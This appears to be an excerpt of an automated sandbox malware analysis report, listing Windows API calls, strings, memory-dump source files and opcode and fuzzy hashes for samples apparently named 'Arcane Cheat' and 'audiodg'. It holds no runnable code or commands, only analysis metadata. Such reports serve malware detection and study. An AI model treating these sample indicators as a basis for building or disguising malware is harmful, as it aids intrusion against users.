                                    • Part of subcall function 0082DA98: _swprintf.LIBCMT ref: 0082DABE
                                    • Part of subcall function 0082DA98: _strlen.LIBCMT ref: 0082DADF
                                    • Part of subcall function 0082DA98: SetDlgItemTextW.USER32(?,0085E154,?), ref: 0082DB3F
                                    • Part of subcall function 0082DA98: GetWindowRect.USER32(?,?), ref: 0082DB79
                                    • Part of subcall function 0082DA98: GetClientRect.USER32(?,?), ref: 0082DB85
                                  • GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                  • SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  Strings
                                  Similarity
                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                  • String ID: 0
                                  • API String ID: 2622349952-4108050209
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00830A78,?), ref: 00830854
                                  • GetLastError.KERNEL32(?), ref: 00830860
                                    • Part of subcall function 00826E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00826EAF
                                  Strings
                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00830869
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                  • API String ID: 1091760877-2248577382
                                  • Opcode ID: ed652ac822d9c3ba3f815dd1417cf20a3597c75404e06400c2d0841da6305251
                                  • Instruction ID: 71346f3a78553a91e2ae7f57831b2df6bd44842e7d3e81d2861fa5a1c275d21e
                                  • Opcode Fuzzy Hash: ed652ac822d9c3ba3f815dd1417cf20a3597c75404e06400c2d0841da6305251
                                  • Instruction Fuzzy Hash: 75D02E3590863063CA012768AC0ADAF3A04FF52372F610324F238E92F0EE2409A086D6
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,0082D32F,?), ref: 0082DA53
                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0082D32F,?), ref: 0082DA61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FindHandleModuleResource
                                  • String ID: RTL
                                  • API String ID: 3537982541-834975271
                                  • Opcode ID: f660f400dbb397985444cfb6699d30cbfddece9524f9e5f6b25bb66f830675f8
                                  • Instruction ID: 039611b3b5ee3781606dac79ece790b2d07e0063f46af1efd0827fb5debd9ae5
                                  • Opcode Fuzzy Hash: f660f400dbb397985444cfb6699d30cbfddece9524f9e5f6b25bb66f830675f8
                                  • Instruction Fuzzy Hash: 84C0127128576076DB3017307C0DB836D88BB11B93F05044CB541DA1D0D5E9C9448690
                                  • Instruction ID: 0b6e42b07b2f277be3cf5afff6e2db20b37a2830d1e6f5e6b4b3fa7765661d9d
                                  • Opcode Fuzzy Hash: 0ee8968f61e82990d32bb58f719dccdea5ad8383aa6b2519b2750e3d0342a1f3
                                  • Instruction Fuzzy Hash: D251D331A1994E8FEB58EB68C875ABD7BE1FF19304F4002BAD01DC72D6CE7468418B00
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de345134966d9728313646dd909466d00524bb5ffb8ef821bd54e4e4de285a15
                                  • Instruction ID: 1e6782475be8637a9ebaeb452746a0b7037bc783a8af5722f32018e4d65cd731
                                  • Opcode Fuzzy Hash: de345134966d9728313646dd909466d00524bb5ffb8ef821bd54e4e4de285a15
                                  • Instruction Fuzzy Hash: 97512C71E0A61D8FEB64EB94C4646EDB7F1EF58310F51417AD029E71A2DE786A44CF00
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1081c2f9106c9d900fb7cd057835904f60092b4b6e4d0778a17234f42dd2968
                                  • Instruction ID: 2fd52127c386d12d4d2b2b67fc485e564d000e43b4f0f656a90e7ca84ad9a4cb
                                  • Opcode Fuzzy Hash: d1081c2f9106c9d900fb7cd057835904f60092b4b6e4d0778a17234f42dd2968
                                  • Instruction Fuzzy Hash: 8A41A1B1A1990D8FE758DB6CC8253A87BE5EF9A324F5042BED019C72DACBF518458B40
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 70655b4223eee51657be94850cd8e782d00f768fd3f45a2d56565090ec819a7f
                                  • Instruction ID: 7f520a875d9ce8e830c97f605874b56cc7d6b12a0725d6d7fad0a1ec150e6a4e
                                  • Opcode Fuzzy Hash: 70655b4223eee51657be94850cd8e782d00f768fd3f45a2d56565090ec819a7f
                                  • Instruction Fuzzy Hash: 1321F771E0952D8FEB64EB98C4A4AEDBBF1FF58310F55417AD019E72A1CA786980CF40
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59f1ead569d4378090950fff45207ebd567e40b35d5b1e2788c74aa7d4196feb
                                  • Instruction ID: 0413f8f4ef39084d4d6aee6a5c93d75e2e01ac8c2bc687006b8856b22eef64b2
                                  • Opcode Fuzzy Hash: 59f1ead569d4378090950fff45207ebd567e40b35d5b1e2788c74aa7d4196feb
                                  • Instruction Fuzzy Hash: 37219F3094E69A8FD757ABB488686A97FF0FF06310F0504FBD059CB0B2DA789545CB11
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eef7ae21081c15f32454093c7c42227835d72b0898bd34e16de12817e2be4cd7
                                  • Instruction ID: d980b429f3898f2bf885f75cff850fcf18551fbcfd3a14f7755f80219f04a29c
                                  • Opcode Fuzzy Hash: eef7ae21081c15f32454093c7c42227835d72b0898bd34e16de12817e2be4cd7
                                  • Instruction Fuzzy Hash: 7011C471E1A51E4FE7A0EBA8C8695FD7BE0FF58700F4149BAD42CC70A6EE74A5408B40
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7204fb5f0f027565228e32a59d05347a25145355d2be6370e3a7dc96a853194
                                  • Instruction ID: d2a61c7b2892ebbb2e38b3d238675d5783bcf091f4c96441e42709e7464e1b90
                                  • Opcode Fuzzy Hash: e7204fb5f0f027565228e32a59d05347a25145355d2be6370e3a7dc96a853194
                                  • Instruction Fuzzy Hash: 9311C870A1E65E4FEBA9DBA484692F97BE0FF65300F01047FD02DC60E2EA756644CB00
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56952e8678cf04f300d73139a33c0a1f6a3721456493cbc0cd3409461e963ca3
                                  • Instruction ID: b05d5c7a03e47891b6726f0572705c9f38837d8a04c124b9cd674cc33001fc7b
                                  • Opcode Fuzzy Hash: 56952e8678cf04f300d73139a33c0a1f6a3721456493cbc0cd3409461e963ca3
                                  • Instruction Fuzzy Hash: 31118230A0965E8FDB58EFA4C8696BD7BE0FF18300F0105BFD429C21A2DB74A5408B00
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d33a2460c875f8d56828bdc1fe5f6eeeaf32c11ecb19f40acd1d89522a41de3e
                                  • Instruction ID: a0ff5d10c614d129208d0aaad26d0f209593beb09904f6294e63ab55bca95ff3
                                  • Opcode Fuzzy Hash: d33a2460c875f8d56828bdc1fe5f6eeeaf32c11ecb19f40acd1d89522a41de3e
                                  • Instruction Fuzzy Hash: 7201B530A0A65D8FE761FBB484695A97BE0EF56300F4244B7D428C70A6EE74E5808B01
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1b84c1a44ecdd0c586af21657b21d10f43f472f6b223483c55a528a77e78013
                                  • Instruction ID: f3ca34aa6a2d18ccca2bb5f525abbd9a8443c2ad9461b6868d0d6f875cd1e123
                                  • Opcode Fuzzy Hash: a1b84c1a44ecdd0c586af21657b21d10f43f472f6b223483c55a528a77e78013
                                  • Instruction Fuzzy Hash: F1019E30A1951E8FDB98EF64C4656BA77A1FF68304F21447ED42EC31A4CE75A650CF40
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21e27fd0a7b4b3d25a71b7e10f8982444833876f22baab35ac6d110288e695b0
                                  • Instruction ID: 4f6707772c56ab9b65433f630783342eafccf3c32dbcc2ce151e445c2de1c3ca
                                  • Opcode Fuzzy Hash: 21e27fd0a7b4b3d25a71b7e10f8982444833876f22baab35ac6d110288e695b0
                                  • Instruction Fuzzy Hash: 9301D230E1A55E4FE770EF6488685A97BE1FF09304F4245BAD428C70B2EE74E2408B04
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5205ac864eae15b2ecbea89c60bd2fe644967bc41016134fa6e7580d6fef3ad5
                                  • Instruction ID: cde9ba4709fb82d7cfa74a8c5c6aa5a71474a129990ce032bc1cea0db3593958
                                  • Opcode Fuzzy Hash: 5205ac864eae15b2ecbea89c60bd2fe644967bc41016134fa6e7580d6fef3ad5
                                  • Instruction Fuzzy Hash: 8701D470E1A65E8FE761EBB484695A97FE0EF19300F4249B7D41CC70B2EE74E2548B01
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 55122892e4d92f4600cb2ae167789220fa85fb096f837fcbd3c56387245945f6
                                  • Instruction ID: 72e65e13dc594923d636655cba3fcac1063380079c0c11f323121b947b99a960
                                  • Opcode Fuzzy Hash: 55122892e4d92f4600cb2ae167789220fa85fb096f837fcbd3c56387245945f6
                                  • Instruction Fuzzy Hash: B5017131E1A65E4FE765ABA484686B97FE0EF19300F4245B7D42CC60B6EA74E5408B41
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8305dd9f5b63b10321284b8e3ecc0748975396df36f3a5960641dbb1d18ab051
                                  • Instruction ID: a1bb8f008af0e26a3d312130ed489b50d037b5281b2f526e37ec1532e06b2743
                                  • Opcode Fuzzy Hash: 8305dd9f5b63b10321284b8e3ecc0748975396df36f3a5960641dbb1d18ab051
                                  • Instruction Fuzzy Hash: C001D470A4E75D4FE762A7B488695A97FE0EF05300F0648F7C418CB0B6DA78A6688B01
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7e866ffe36169939639345d07332b768321ed35ae9361dce321543bbec3882e
                                  • Instruction ID: c13665afedead29155e1e90297b1fd1b9e4943f012d7f5272d7dbc2bc882a118
                                  • Opcode Fuzzy Hash: c7e866ffe36169939639345d07332b768321ed35ae9361dce321543bbec3882e
                                  • Instruction Fuzzy Hash: 58016230A19A1E8AEB58EBE4D4685B977A0FF18305F11447FD42EC21E5DF76A650CA00
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 350926d010d560720c3a786638d082cc18100ffd61d6345caed5a4949d18ee3d
                                  • Instruction ID: 19e604985de05ec61e31734445f28e9e0cdb544ad9d00b2bc326da6806a19bf9
                                  • Opcode Fuzzy Hash: 350926d010d560720c3a786638d082cc18100ffd61d6345caed5a4949d18ee3d
                                  • Instruction Fuzzy Hash: BE016D30A1960E8BEB69EFE4D4696BD77A0FF18305F1148BED42EC21E5DE75A250CA00
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29120ffe19a5c1f7396d906e767a2617e8d6f74e3e2cd18e182ab6bb23e2cdc9
                                  • Instruction ID: dfa302b252dbe53d9f37efd329f01282d32c29925bc1605edd381a5fbaf87e26
                                  • Opcode Fuzzy Hash: 29120ffe19a5c1f7396d906e767a2617e8d6f74e3e2cd18e182ab6bb23e2cdc9
                                  • Instruction Fuzzy Hash: 4601D630A1A68E8FDB949F54C4652B97BA0EF65304F51007AE82CC21A1DAB99550CF80
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4737059aebf4cf40c5f7f0d8ae0f77f926e6e6f5ae988af59251a37222c3825e
                                  • Instruction ID: acda37ccfd70169c29112468d248a6ecfbc1a280f66c0436829149641b95fd50
                                  • Opcode Fuzzy Hash: 4737059aebf4cf40c5f7f0d8ae0f77f926e6e6f5ae988af59251a37222c3825e
                                  • Instruction Fuzzy Hash: DEF0FC30A1A55E8FDB94EF64C4256FA7790EF25309F11047AE82DC30D1CE75A550CF80
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34ac0740d995dd8a91d1455d59aa6259cf037c50cc7669b9be93fde98637d71e
                                  • Instruction ID: a32cbdc71bd14bb255ab869f789c55167bf6b442656c395edcc7f7b790232549
                                  • Opcode Fuzzy Hash: 34ac0740d995dd8a91d1455d59aa6259cf037c50cc7669b9be93fde98637d71e
                                  • Instruction Fuzzy Hash: 88F0C830E2A56F49FBA49BA898692BA76E4FF65305F00053FD42DC20E1EEB812548A40
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b71ea8c773ff1832057166b3e124df531d8811f9d8a0db876224e83e65cc6011
                                  • Instruction ID: 999ee21b004e34614e490ef0da01da9ab5e2571b47439286f284e106fe5560db
                                  • Opcode Fuzzy Hash: b71ea8c773ff1832057166b3e124df531d8811f9d8a0db876224e83e65cc6011
                                  • Instruction Fuzzy Hash: 27F0C83190E38D4FD7699FB088651E93F60AF55200F4604FBD428C60F2DA789544CB01
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d64c4ec3925342a6952e55d3a4b7aad769ca2d63424e8c7ae5ac533f9638e82
                                  • Instruction ID: b80c4b4005e1938b44ccea2cf69f6d0e58fb5af2b1b4e56d64fcef1a904a3d0f
                                  • Opcode Fuzzy Hash: 6d64c4ec3925342a6952e55d3a4b7aad769ca2d63424e8c7ae5ac533f9638e82
                                  • Instruction Fuzzy Hash: D9F0F03091A78E8BEB689FA084282F93FA0FF15300F4100BFE428C50E2DB79A5508B00
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction ID: 0b64b2d99a5c667166bb96b7af1adc213228b20c66434f60ac27826e1aa621f8
                                  • Opcode Fuzzy Hash: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction Fuzzy Hash: 38F0D4B0D0952D8EDBA4DB088894BE9B7B1FB59300F1000EEC20DE32A1DA305A80CF04
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f62462e18452c5f4e518d121eba566db30f55d32f74eeeb4473df747568dd00
                                  • Instruction ID: 5247b79ffcf51f82df9b959074d88b6c19783106a601701c95081eff7fe34865
                                  • Opcode Fuzzy Hash: 1f62462e18452c5f4e518d121eba566db30f55d32f74eeeb4473df747568dd00
                                  • Instruction Fuzzy Hash: 50128E31E1964D8FEB99EF68C8647B8BBB2FF19304F0501BAD08DD71A2CA746940CB11
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aeb11e146879d99a632dff303fd2b745d40dfcaf1b2a1d6b4c3f61b617f3218c
                                  • Instruction ID: 2b64ea3e3fd7141abd7723084fdfa53582b1591d6526be66d72b8b6677480b30
                                  • Opcode Fuzzy Hash: aeb11e146879d99a632dff303fd2b745d40dfcaf1b2a1d6b4c3f61b617f3218c
                                  • Instruction Fuzzy Hash: 03024531A0E68A4FE766AB689C251F93BB0FF06325F0501BBD449CB0A3EA7C6545C761
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5dc831a9a37445633440ef7b89e51e278862643484b308aa4c68d8e5d99de12
                                  • Instruction ID: 14b9faf449043e09bb59b83eb8a1656a3bbbf921eec100b8f1936b582482d3e7
                                  • Opcode Fuzzy Hash: d5dc831a9a37445633440ef7b89e51e278862643484b308aa4c68d8e5d99de12
                                  • Instruction Fuzzy Hash: 2BB1D130A0A68E8FD756EB64C8686F9BBF1FF19304F0645BBD419C70A2DB78A644C711
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "$$$/$]
                                  • API String ID: 0-2504117364
                                  • Opcode ID: b59d1949870786f003f8f4523fba80cabab213bd7a078ce976d9d3d303b56afe
                                  • Instruction ID: 4260cf41e7a4a69eaf1ecbb33e808bfd6596eaf852f1b7c24c13287c2d6ad79f
                                  • Opcode Fuzzy Hash: b59d1949870786f003f8f4523fba80cabab213bd7a078ce976d9d3d303b56afe
                                  • Instruction Fuzzy Hash: 3C51C570E1522DCFEB68DF94D8A4BECB6B1BB54300F1140AED05EA7291CB785A84DF10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,$/
                                  • API String ID: 0-2486155881
                                  • Opcode ID: c06af0a8c8d04acc0fdc00cb82dccdc580a927868a7685fe6e233d393f874c64
                                  • Instruction ID: 2c6cc7335f607270d378796702749891b0687c83002f36f8637b9ea7623dd363
                                  • Opcode Fuzzy Hash: c06af0a8c8d04acc0fdc00cb82dccdc580a927868a7685fe6e233d393f874c64
                                  • Instruction Fuzzy Hash: 9D21DA30E1966D8AEB68DF54D864AED73B1FB55305F1102BEC41DA7294CB745A80CF04
                                  Memory Dump Source
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 22fcfd4cc1f5f0d002f8ad727d0e09cab9ffd6177805841039aafddb0ad0de37
                                  • Instruction ID: 32e706953a4def8286b41b012267ddf8e9b8e1af86e4f7c547536578e1a1b634
                                  • Opcode Fuzzy Hash: 22fcfd4cc1f5f0d002f8ad727d0e09cab9ffd6177805841039aafddb0ad0de37
                                  • Instruction Fuzzy Hash: 5111C131F0A54E4FE7A0EBA8C8691BD7BE2FF58700F4245B6D41CC70A6EE74A6448750
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52c6eb457864e09ce4f56dcb244ba0ae2692fadb0f466f2d199af9d3586c47c5
                                  • Instruction ID: 04a6786a596d59611f4820564eeac7441b0146426d2703e5adde7066f382e5a8
                                  • Opcode Fuzzy Hash: 52c6eb457864e09ce4f56dcb244ba0ae2692fadb0f466f2d199af9d3586c47c5
                                  • Instruction Fuzzy Hash: 0F11EE3094E78E4FD71A9BA4987A5B97FB0EF06300F0641EBC059CB0E3CA696655CB11
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec287c6852bd55b26d1fc0a7c3690d349f2e137fe949f517b73bf8d86ef8ef76
                                  • Instruction ID: 87727c9730d8cb67aa52c5d5fe0dc5999ee583e7cd3ad8da95a98aa1f8c71875
                                  • Opcode Fuzzy Hash: ec287c6852bd55b26d1fc0a7c3690d349f2e137fe949f517b73bf8d86ef8ef76
                                  • Instruction Fuzzy Hash: 8011A230A0965E8FEB98EF68C4692B97BE1FF28300F0105BED42DC21A2DE75A1408B40
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6bcd235a7af22439a5f69f18c66d58fa85289ff0d6c4c362ac29a604921c148
                                  • Instruction ID: 3dc4ea3e5f6dc3104b9a8df1236ee2a222440b0a3f92602ed4f7c15d4fa6aef7
                                  • Opcode Fuzzy Hash: c6bcd235a7af22439a5f69f18c66d58fa85289ff0d6c4c362ac29a604921c148
                                  • Instruction Fuzzy Hash: 9F11B730A09A4E8FDB98EF68C4652B97BE1FF58301F01057ED42DC71A2DA75A544CB40
                                  Memory Dump Source
